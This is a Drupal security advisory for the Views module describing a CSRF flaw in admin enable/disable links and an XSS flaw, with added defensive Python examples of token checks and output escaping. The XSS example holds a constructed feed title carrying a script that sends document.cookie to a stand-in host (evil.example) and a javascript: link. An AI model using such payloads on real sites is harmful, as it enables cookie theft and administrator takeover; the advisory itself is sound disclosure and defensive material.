• Advisory ID: DRUPAL-SA-CONTRIB-2010-067
  • Project: Views (third-party module)
  • Version: 5.x, 6.x
  • Date: 2010-June-16
  • Security risk: Less critical
  • Exploitable from: Remote
  • Vulnerability: Multiple vulnerabilities

Description

The Views module provides a flexible method for Drupal site designers to control how lists and tables of content are presented.

Cross Site Request Forgery (CSRF)

The Views UI module, which is included with Views, lets an administrator enable or disable a View simply by following a link to a particular path (e.g. admin/build/views/disable/frontpage). No protection such as a form token ties such a request to the administrator's own session, so the feature is vulnerable to Cross Site Request Forgery (CSRF): an attacker who can get a logged-in administrator to request one of these URLs (for example from a page under the attacker's control) could enable or disable all Views on the site.

Mitigating factors: The vulnerable paths belong to the Views UI module; if Views UI is disabled, Views is not affected by this vulnerability.

This issue affects Views for Drupal 5 and Drupal 6.
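The following is an added illustration of the CSRF pattern described above and of the kind of per-session token that closes it. It is not Views code and not the actual fix: the routing, the HMAC token scheme, the session identifiers and the site key are assumptions chosen to show why a link-triggered state change needs proof that the administrator's own session produced the link.

```python
"""Forged GET request against a state-changing admin path, modelled on the
Views UI enable/disable links in this advisory (added example, not Views code)."""
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

SITE_KEY = b"constructed-site-secret"   # assumption: stands in for a site private key
ADMIN_SESSION = "sess-admin-7f3a"       # constructed: known only to the admin's browser
ATTACKER_SESSION = "sess-attacker-91c0"  # constructed: the attacker's own session


def make_token(session_id: str, path: str) -> str:
    """Token bound to the requester's session and the exact path being hit."""
    msg = f"{session_id}\x00{path}".encode()
    return hmac.new(SITE_KEY, msg, hashlib.sha256).hexdigest()


def parse_route(path: str):
    """Accept admin/build/views/<enable|disable>/<view>; return (action, view) or None."""
    segs = path.strip("/").split("/")
    if len(segs) != 5 or segs[:3] != ["admin", "build", "views"]:
        return None
    if segs[3] not in ("enable", "disable"):
        return None
    return segs[3], segs[4]


def handle_vulnerable(url: str, session_id: str, is_admin: bool, state: dict) -> int:
    """Pattern in the advisory: a permission check only. Nothing proves the
    admin intended the request, so any page the admin visits can fire it."""
    parts = urlsplit(url)
    route = parse_route(parts.path)
    if route is None:
        return 404
    if not is_admin:
        return 403
    action, view = route
    if view not in state:
        return 404
    state[view] = (action == "enable")
    return 200


def handle_fixed(url: str, session_id: str, is_admin: bool, state: dict) -> int:
    """Same route, but the link must carry a token that only the admin's own
    session could have obtained, so a cross-site forgery is rejected."""
    parts = urlsplit(url)
    route = parse_route(parts.path)
    if route is None:
        return 404
    if not is_admin:
        return 403
    supplied = parse_qs(parts.query).get("token", [""])[0]
    expected = make_token(session_id, parts.path)
    if not hmac.compare_digest(supplied, expected):
        return 403  # missing, stale or attacker-minted token
    action, view = route
    if view not in state:
        return 404
    state[view] = (action == "enable")
    return 200


def simulate(handler) -> dict:
    """Run three requests through `handler` and report the outcome of each:
    1. the attacker's page makes the admin's browser fetch the disable URL,
       so it arrives with the admin's session (classic CSRF);
    2. the attacker pre-computes a token from their own session;
    3. the admin clicks the genuine link the UI generated for them."""
    state = {"frontpage": True, "archive": True}
    path = "/admin/build/views/disable/frontpage"
    results = {}

    forged = f"http://site.example{path}"
    results["forged"] = handler(forged, ADMIN_SESSION, True, state)
    results["frontpage_after_forgery"] = state["frontpage"]

    state["frontpage"] = True
    guessed = f"http://site.example{path}?token={make_token(ATTACKER_SESSION, path)}"
    results["attacker_token"] = handler(guessed, ADMIN_SESSION, True, state)
    results["frontpage_after_guess"] = state["frontpage"]

    state["frontpage"] = True
    genuine = f"http://site.example{path}?token={make_token(ADMIN_SESSION, path)}"
    results["genuine"] = handler(genuine, ADMIN_SESSION, True, state)
    results["frontpage_after_genuine"] = state["frontpage"]
    return results


if __name__ == "__main__":
    print("vulnerable:", simulate(handle_vulnerable))
    print("fixed:     ", simulate(handle_fixed))
```

With the vulnerable handler the forged request disables the front page View even though it carries no token; with the fixed handler only the link minted for the administrator's session succeeds. Binding the token to the path as well as the session means a token leaked from one action cannot be replayed against another.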

Cross Site Scripting (XSS)

Under certain circumstances, Views could display URLs or aggregator feed titles without escaping them, resulting in a Cross Site Scripting (XSS) vulnerability. Because injected script runs in the browser of whoever views the affected page, an attacker could use it against a logged-in administrator and so gain full administrative access.

This issue affects Views for Drupal 6 only.
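As an added illustration of the two output contexts named above, the block below renders a constructed aggregator item both the unsafe way and with context-appropriate escaping. It is not Views code: the sample feed item, the render functions and the scheme allowlist are assumptions used to show that a title needs HTML escaping while a link target additionally needs its scheme checked, since escaping alone leaves a javascript: URL intact.

```python
"""Escaping a feed title (text context) and a feed link (href context).
Added example, not Views code; the feed item is constructed."""
import html
from urllib.parse import urlsplit

# Constructed aggregator item as a hostile feed could supply it.
FEED_ITEM = {
    "title": '<script>document.location="http://evil.example/?c="+document.cookie</script>',
    "link": " JavaScript:alert(document.cookie)",
}

SAFE_SCHEMES = ("http", "https", "ftp", "mailto")  # assumption: site policy


def render_unescaped(item: dict) -> str:
    """Pattern described in the advisory: values dropped straight into markup."""
    return f'<a href="{item["link"]}">{item["title"]}</a>'


def safe_url(url: str) -> str:
    """Keep relative URLs and allowlisted schemes; anything else becomes ''.
    Leading/trailing whitespace and ASCII control characters are removed
    first, because browsers ignore them when deciding the scheme."""
    cleaned = "".join(ch for ch in url.strip() if ord(ch) >= 32)
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme and scheme not in SAFE_SCHEMES:
        return ""
    return cleaned


def render_escaped(item: dict) -> str:
    """Escape for each context: scheme check plus attribute escaping for the
    href, plain HTML escaping for the visible title."""
    href = html.escape(safe_url(item["link"]), quote=True)
    return f'<a href="{href}">{html.escape(item["title"])}</a>'


def contains_active_content(markup: str) -> bool:
    """Crude check used here only to compare the two renderings."""
    lowered = markup.lower()
    return "<script" in lowered or 'href="javascript:' in lowered


if __name__ == "__main__":
    print(render_unescaped(FEED_ITEM))
    print(render_escaped(FEED_ITEM))
```

The unescaped rendering carries both a script block and a javascript: link; the escaped rendering shows the title as literal text and drops the link target. A URL filter that only HTML-escapes the value would still emit the javascript: scheme unchanged, which is why the two contexts need different treatment.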

Versions affected

  • Views module for Drupal 5.x versions prior to 5.x-1.8
  • Views module for Drupal 6.x versions prior to 6.x-2.11

Drupal core is not affected. If you do not use the contributed Views module, there is nothing you need to do.

Solution

Install the latest version:

  • If you use the Views module for Drupal 5.x upgrade to Views 5.x-1.8
  • If you use the Views module for Drupal 6.x upgrade to Views 6.x-2.11

See also the Views project page.

Reported by

  • The Cross Site Request Forgery (CSRF) vulnerability was reported by Martin Barbella (mbarbella).
  • The Cross Site Scripting (XSS) vulnerabilities were reported by Earl Miles (merlinofchaos), module maintainer, and Daniel Wehner (dereine), module co-maintainer.

Fixed by

Contact

The Drupal security team can be reached at security at drupal.org or via the form at http://drupal.org/contact.